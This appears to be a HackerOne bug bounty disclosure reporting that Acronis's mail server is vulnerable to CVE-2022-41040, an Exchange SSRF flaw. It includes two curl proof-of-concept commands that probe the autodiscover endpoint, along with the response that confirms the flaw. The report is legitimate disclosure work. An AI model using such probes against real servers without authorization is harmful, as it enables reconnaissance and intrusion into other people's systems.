Lucene search

K
hackeroneBbece5b1ea2cbb33d0690adH1:1719719
HistoryOct 02, 2022 - 8:47 a.m.

Acronis: mail.acronis.com is vulnerable to zero day vulnerability CVE-2022-41040

2022-10-0208:47:22
bbece5b1ea2cbb33d0690ad
hackerone.com
$1000
62
acronis
vulnerable
zero day
cve-2022-41040
ssrf
impact
bugbounty

EPSS

0.952

Percentile

99.4%

Hello Acronis team,

Please run

curl -ksL -m5 -o /dev/null -I -w “%{http_code}” “https://mail.acronis.com/autodiscover/autodiscover.json?Email=autodiscover/[email protected]&Protocol=ActiveSync
curl -ksL -m5 “https://mail.acronis.com/autodiscover/autodiscover.json?Email=autodiscover/[email protected]&Protocol=ActiveSync” | grep Protocol

and get following output

404 and {“Protocol”:“ActiveSync”,“Url”:“https://eas.outlook.com/Microsoft-Server-ActiveSync”}

Proving that mail.acronis.com is vulnerable to CVE-2022-41040

Poc video attached

Impact

SSRF can be used to for unauthorized actions or access to confidential data.